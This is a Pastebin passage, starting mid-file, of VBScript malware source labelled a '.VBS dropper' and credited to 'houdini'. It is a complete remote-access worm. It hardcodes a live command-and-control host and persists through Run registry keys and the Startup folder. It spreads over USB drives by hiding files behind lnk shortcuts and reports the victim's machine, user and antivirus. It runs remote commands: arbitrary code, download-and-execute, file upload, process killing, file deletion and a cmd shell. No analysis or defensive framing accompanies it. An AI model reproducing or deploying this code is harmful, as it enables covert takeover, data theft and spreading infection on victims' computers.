  554. function cmdshell (cmd)
  555.  
  556. dim httpobj,oexec,readallfromany
  557.  
  558. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  559. if not oexec.stdout.atendofstream then
  560. readallfromany = oexec.stdout.readall
  561. elseif not oexec.stderr.atendofstream then
  562. readallfromany = oexec.stderr.readall
  563. else
  564. readallfromany = ""
  565. end if
  566.  
  567. cmdshell = readallfromany
  568. end function
  569. --------------------------------------------------------------
  570. 2nd. .VBS dropper
  571. --------------------------------------------------------------
  572.  
  573.  
  574. '<[ recoder : houdini (c) skype : houdini-fx ]>
  575.  
  576. '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  577.  
  578. host = "xtkd.ddns.net"
  579. port = 3233
  580. installdir = "%temp%"
  581. lnkfile = false
  582. lnkfolder = false
  583.  
  584. '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
  585.  
  586. dim shellobj
  587. set shellobj = wscript.createobject("wscript.shell")
  588. dim filesystemobj
  589. set filesystemobj = createobject("scripting.filesystemobject")
  590. dim httpobj
  591. set httpobj = createobject("msxml2.xmlhttp")
  592.  
  593.  
  594. '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
  595.  
  596. installname = wscript.scriptname
  597. startup = shellobj.specialfolders ("startup") & "\"
  598. installdir = shellobj.expandenvironmentstrings(installdir) & "\"
  599. if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
  600. spliter = "<" & "|" & ">"
  601. sleep = 5000
  602. dim response
  603. dim cmd
  604. dim param
  605. info = ""
  606. usbspreading = ""
  607. startdate = ""
  608. dim oneonce
  609.  
  610. '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
  611. on error resume next
  612.  
  613.  
  614. instance
  615. while true
  616.  
  617. install
  618.  
  619. response = ""
  620. response = post ("is-ready","")
  621. cmd = split (response,spliter)
  622. select case cmd (0)
  623. case "excecute"
  624. param = cmd (1)
  625. execute param
  626. case "update"
  627. param = cmd (1)
  628. oneonce.close
  629. set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
  630. oneonce.write param
  631. oneonce.close
  632. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
  633. wscript.quit
  634. case "uninstall"
  635. uninstall
  636. case "send"
  637. download cmd (1),cmd (2)
  638. case "site-send"
  639. sitedownloader cmd (1),cmd (2)
  640. case "recv"
  641. param = cmd (1)
  642. upload (param)
  643. case "enum-driver"
  644. post "is-enum-driver",enumdriver
  645. case "enum-faf"
  646. param = cmd (1)
  647. post "is-enum-faf",enumfaf (param)
  648. case "enum-process"
  649. post "is-enum-process",enumprocess
  650. case "cmd-shell"
  651. param = cmd (1)
  652. post "is-cmd-shell",cmdshell (param)
  653. case "delete"
  654. param = cmd (1)
  655. deletefaf (param)
  656. case "exit-process"
  657. param = cmd (1)
  658. exitprocess (param)
  659. case "sleep"
  660. param = cmd (1)
  661. sleep = eval (param)
  662. end select
  663.  
  664. wscript.sleep sleep
  665.  
  666. wend
  667.  
  668.  
  669. sub install
  670. on error resume next
  671. dim lnkobj
  672. dim filename
  673. dim foldername
  674. dim fileicon
  675. dim foldericon
  676.  
  677. upstart
  678. for each drive in filesystemobj.drives
  679.  
  680. if drive.isready = true then
  681. if drive.freespace > 0 then
  682. if drive.drivetype = 1 then
  683. filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
  684. if filesystemobj.fileexists (drive.path & "\" & installname) then
  685. filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
  686. end if
  687. for each file in filesystemobj.getfolder( drive.path & "\" ).Files
  688. if not lnkfile then exit for
  689. if instr (file.name,".") then
  690. if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
  691. file.attributes = 2+4
  692. if ucase (file.name) <> ucase (installname) then
  693. filename = split(file.name,".")
  694. set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
  695. lnkobj.windowstyle = 7
  696. lnkobj.targetpath = "cmd.exe"
  697. lnkobj.workingdirectory = ""
  698. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  699. fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
  700. if instr (fileicon,",") = 0 then
  701. lnkobj.iconlocation = file.path
  702. else
  703. lnkobj.iconlocation = fileicon
  704. end if
  705. lnkobj.save()
  706. end if
  707. end if
  708. end if
  709. next
  710. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  711. if not lnkfolder then exit for
  712. folder.attributes = 2+4
  713. foldername = folder.name
  714. set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
  715. lnkobj.windowstyle = 7
  716. lnkobj.targetpath = "cmd.exe"
  717. lnkobj.workingdirectory = ""
  718. lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
  719. foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
  720. if instr (foldericon,",") = 0 then
  721. lnkobj.iconlocation = folder.path
  722. else
  723. lnkobj.iconlocation = foldericon
  724. end if
  725. lnkobj.save()
  726. next
  727. end If
  728. end If
  729. end if
  730. next
  731. err.clear
  732. end sub
  733.  
  734. sub uninstall
  735. on error resume next
  736. dim filename
  737. dim foldername
  738.  
  739. shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  740. shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
  741. filesystemobj.deletefile startup & installname ,true
  742. filesystemobj.deletefile wscript.scriptfullname ,true
  743.  
  744. for each drive in filesystemobj.drives
  745. if drive.isready = true then
  746. if drive.freespace > 0 then
  747. if drive.drivetype = 1 then
  748. for each file in filesystemobj.getfolder ( drive.path & "\").files
  749. on error resume next
  750. if instr (file.name,".") then
  751. if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
  752. file.attributes = 0
  753. if ucase (file.name) <> ucase (installname) then
  754. filename = split(file.name,".")
  755. filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
  756. else
  757. filesystemobj.deletefile (drive.path & "\" & file.name)
  758. end If
  759. else
  760. filesystemobj.deletefile (file.path)
  761. end if
  762. end if
  763. next
  764. for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
  765. folder.attributes = 0
  766. next
  767. end if
  768. end if
  769. end if
  770. next
  771. wscript.quit
  772. end sub
  773.  
  774. function post (cmd ,param)
  775.  
  776. post = param
  777. httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
  778. httpobj.setrequestheader "user-agent:",information
  779. httpobj.send param
  780. post = httpobj.responsetext
  781. end function
  782.  
  783. function information
  784. on error resume next
  785. if inf = "" then
  786. inf = hwid & spliter
  787. inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
  788. inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
  789.  
  790. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  791. set os = root.execquery ("select * from win32_operatingsystem")
  792. for each osinfo in os
  793. inf = inf & osinfo.caption & spliter
  794. exit for
  795. next
  796. inf = inf & "plus" & spliter
  797. inf = inf & security & spliter
  798. inf = inf & usbspreading
  799. information = inf
  800. else
  801. information = inf
  802. end if
  803. end function
  804.  
  805.  
  806. sub upstart ()
  807. on error resume Next
  808.  
  809. shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  810. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
  811. filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
  812. filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
  813.  
  814. end sub
  815.  
  816.  
  817. function hwid
  818. on error resume next
  819.  
  820. set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  821. set disks = root.execquery ("select * from win32_logicaldisk")
  822. for each disk in disks
  823. if disk.volumeserialnumber <> "" then
  824. hwid = disk.volumeserialnumber
  825. exit for
  826. end if
  827. next
  828. end function
  829.  
  830.  
  831. function security
  832. on error resume next
  833.  
  834. security = ""
  835.  
  836. set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
  837. set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
  838. for each objitem in colitems
  839. versionstr = split (objitem.version,".")
  840. next
  841. versionstr = split (colitems.version,".")
  842. osversion = versionstr (0) & "."
  843. for x = 1 to ubound (versionstr)
  844. osversion = osversion & versionstr (i)
  845. next
  846. osversion = eval (osversion)
  847. if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
  848.  
  849. set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
  850. Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
  851.  
  852. for each objantivirus in colantivirus
  853. security = security & objantivirus.displayname & " ."
  854. next
  855. if security = "" then security = "nan-av"
  856. end function
  857.  
  858.  
  859. function instance
  860. on error resume next
  861.  
  862. usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
  863. if usbspreading = "" then
  864. if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
  865. usbspreading = "true - " & date
  866. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
  867. else
  868. usbspreading = "false - " & date
  869. shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
  870.  
  871. end if
  872. end If
  873.  
  874.  
  875.  
  876. upstart
  877. set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
  878. set installfullnameshort = filesystemobj.getfile (installdir & installname)
  879. if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
  880. shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
  881. wscript.quit
  882. end If
  883. err.clear
  884. set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
  885. if err.number > 0 then wscript.quit
  886. end function
  887.  
  888.  
  889. sub sitedownloader (fileurl,filename)
  890.  
  891. strlink = fileurl
  892. strsaveto = installdir & filename
  893. set objhttpdownload = createobject("msxml2.xmlhttp" )
  894. objhttpdownload.open "get", strlink, false
  895. objhttpdownload.send
  896.  
  897. set objfsodownload = createobject ("scripting.filesystemobject")
  898. if objfsodownload.fileexists (strsaveto) then
  899. objfsodownload.deletefile (strsaveto)
  900. end if
  901.  
  902. if objhttpdownload.status = 200 then
  903. dim objstreamdownload
  904. set objstreamdownload = createobject("adodb.stream")
  905. with objstreamdownload
  906. .type = 1
  907. .open
  908. .write objhttpdownload.responsebody
  909. .savetofile strsaveto
  910. .close
  911. end with
  912. set objstreamdownload = nothing
  913. end if
  914. if objfsodownload.fileexists(strsaveto) then
  915. shellobj.run objfsodownload.getfile (strsaveto).shortpath
  916. end if
  917. end sub
  918.  
  919. sub download (fileurl,filedir)
  920.  
  921. if filedir = "" then
  922. filedir = installdir
  923. end if
  924.  
  925. strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
  926. set objhttpdownload = createobject("msxml2.xmlhttp")
  927. objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
  928. objhttpdownload.send ""
  929.  
  930. set objfsodownload = createobject ("scripting.filesystemobject")
  931. if objfsodownload.fileexists (strsaveto) then
  932. objfsodownload.deletefile (strsaveto)
  933. end if
  934. if objhttpdownload.status = 200 then
  935. dim objstreamdownload
  936. set objstreamdownload = createobject("adodb.stream")
  937. with objstreamdownload
  938. .type = 1
  939. .open
  940. .write objhttpdownload.responsebody
  941. .savetofile strsaveto
  942. .close
  943. end with
  944. set objstreamdownload = nothing
  945. end if
  946. if objfsodownload.fileexists(strsaveto) then
  947. shellobj.run objfsodownload.getfile (strsaveto).shortpath
  948. end if
  949. end sub
  950.  
  951.  
  952. function upload (fileurl)
  953.  
  954. dim httpobj,objstreamuploade,buffer
  955. set objstreamuploade = createobject("adodb.stream")
  956. with objstreamuploade
  957. .type = 1
  958. .open
  959. .loadfromfile fileurl
  960. buffer = .read
  961. .close
  962. end with
  963. set objstreamdownload = nothing
  964. set httpobj = createobject("msxml2.xmlhttp")
  965. httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
  966. httpobj.send buffer
  967. end function
  968.  
  969.  
  970. function enumdriver ()
  971.  
  972. for each drive in filesystemobj.drives
  973. if drive.isready = true then
  974. enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
  975. end if
  976. next
  977. end Function
  978.  
  979. function enumfaf (enumdir)
  980.  
  981. enumfaf = enumdir & spliter
  982. for each folder in filesystemobj.getfolder (enumdir).subfolders
  983. enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
  984. next
  985.  
  986. for each file in filesystemobj.getfolder (enumdir).files
  987. enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
  988.  
  989. next
  990. end function
  991.  
  992.  
  993. function enumprocess ()
  994.  
  995. on error resume next
  996.  
  997. set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
  998. set colitems = objwmiservice.execquery("select * from win32_process",,48)
  999.  
  1000. dim objitem
  1001. for each objitem in colitems
  1002. enumprocess = enumprocess & objitem.name & "|"
  1003. enumprocess = enumprocess & objitem.processid & "|"
  1004. enumprocess = enumprocess & objitem.executablepath & spliter
  1005. next
  1006. end function
  1007.  
  1008. sub exitprocess (pid)
  1009. on error resume next
  1010.  
  1011. shellobj.run "taskkill /F /T /PID " & pid,7,true
  1012. end sub
  1013.  
  1014. sub deletefaf (url)
  1015. on error resume next
  1016.  
  1017. filesystemobj.deletefile url
  1018. filesystemobj.deletefolder url
  1019.  
  1020. end sub
  1021.  
  1022. function cmdshell (cmd)
  1023.  
  1024. dim httpobj,oexec,readallfromany
  1025.  
  1026. set oexec = shellobj.exec ("%comspec% /c " & cmd)
  1027. if not oexec.stdout.atendofstream then
  1028. readallfromany = oexec.stdout.readall
  1029. elseif not oexec.stderr.atendofstream then
  1030. readallfromany = oexec.stderr.readall
  1031. else
  1032. readallfromany = ""
  1033. end if
  1034.  
  1035. cmdshell = readallfromany
  1036. end function
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!